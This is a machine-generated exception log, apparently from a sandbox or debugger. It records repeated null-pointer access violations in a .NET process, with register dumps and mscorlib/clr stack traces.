exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c384
registers.esp: 88136468
registers.edi: 88140932
registers.eax: 0
registers.ebp: 88140940
registers.edx: 48443308
registers.ebx: 44970792
registers.esi: 48035672
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e1c43d
0x5e16834
0x5e165ef
0x5e164c5
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e16436
0x5e1627f
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e12ac0
0x5e12590
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x7f13e4
0x7f0db4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf

exception.instruction_r: 39 09 e8 20 48 a5 6b 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c311
registers.esp: 88140752
registers.edi: 88140816
registers.eax: 0
registers.ebp: 88140824
registers.edx: 48443308
registers.ebx: 44970792
registers.esi: 48035672
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e1c43d
0x5e16834
0x5e165ef
0x5e164c5
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e16436
0x5e1627f
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e12ac0
0x5e12590
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x7f13e4
0x7f0db4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf

exception.instruction_r: 39 09 e8 ad 47 a5 6b 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c384
registers.esp: 88136356
registers.edi: 88140816
registers.eax: 0
registers.ebp: 88140824
registers.edx: 48443308
registers.ebx: 44970792
registers.esi: 48035672
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e1c44b
0x5e16834
0x5e165ef
0x5e164c5
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e16436
0x5e1627f
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e12ac0
0x5e12590
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x7f13e4
0x7f0db4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf

exception.instruction_r: 39 09 e8 a0 4a a5 6b 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c091
registers.esp: 88140752
registers.edi: 88140816
registers.eax: 0
registers.ebp: 88140824
registers.edx: 48036084
registers.ebx: 44970792
registers.esi: 48035672
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e1c44b
0x5e16834
0x5e165ef
0x5e164c5
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e16436
0x5e1627f
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e12ac0
0x5e12590
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x7f13e4
0x7f0db4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf

exception.instruction_r: 39 09 e8 2d 4a a5 6b 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c104
registers.esp: 88136356
registers.edi: 88140816
registers.eax: 0
registers.ebp: 88140824
registers.edx: 48036084
registers.ebx: 44970792
registers.esi: 48035672
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e1c675
0x5e16857
0x5e165ef
0x5e164c5
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e16436
0x5e1627f
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e12ac0
0x5e12590
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x7f13e4
0x7f0db4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf

exception.instruction_r: 39 09 e8 a0 4a a5 6b 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c091
registers.esp: 88140772
registers.edi: 88140836
registers.eax: 0
registers.ebp: 88140844
registers.edx: 48036084
registers.ebx: 44970792
registers.esi: 48035672
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e1c675
0x5e16857
0x5e165ef
0x5e164c5
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e16436
0x5e1627f
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x5e12ac0
0x5e12590
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2a294 @ 0x7202a294
mscorlib+0x34bece @ 0x7194bece
mscorlib+0x34be97 @ 0x7194be97
0x7f13e4
0x7f0db4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf

exception.instruction_r: 39 09 e8 2d 4a a5 6b 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c104
registers.esp: 88136372
registers.edi: 88140836
registers.eax: 0
registers.ebp: 88140844
registers.edx: 48036084
registers.ebx: 44970792
registers.esi: 48035672
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e167cb
0x5e165ef
0x5e1cf1f
0x5e1cece
mscorlib+0x32de48 @ 0x7192de48
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x32dd91 @ 0x7192dd91
mscorlib+0x32dc4c @ 0x7192dc4c
mscorlib+0x32db05 @ 0x7192db05
mscorlib+0x32d9c8 @ 0x7192d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x73fbd2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x73fbd281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x73fbd1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x73fbcf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 a0 4a a5 6b 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c091
registers.esp: 83358152
registers.edi: 83358216
registers.eax: 0
registers.ebp: 83358224
registers.edx: 48036084
registers.ebx: 47096196
registers.esi: 47652464
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e167cb
0x5e165ef
0x5e1cf1f
0x5e1cece
mscorlib+0x32de48 @ 0x7192de48
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x32dd91 @ 0x7192dd91
mscorlib+0x32dc4c @ 0x7192dc4c
mscorlib+0x32db05 @ 0x7192db05
mscorlib+0x32d9c8 @ 0x7192d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x73fbd2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x73fbd281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x73fbd1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x73fbcf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 2d 4a a5 6b 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c104
registers.esp: 83353756
registers.edi: 83358216
registers.eax: 0
registers.ebp: 83358224
registers.edx: 48036084
registers.ebx: 47096196
registers.esi: 47652464
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e167ee
0x5e165ef
0x5e1cf1f
0x5e1cece
mscorlib+0x32de48 @ 0x7192de48
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x32dd91 @ 0x7192dd91
mscorlib+0x32dc4c @ 0x7192dc4c
mscorlib+0x32db05 @ 0x7192db05
mscorlib+0x32d9c8 @ 0x7192d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x73fbd2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x73fbd281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x73fbd1d2
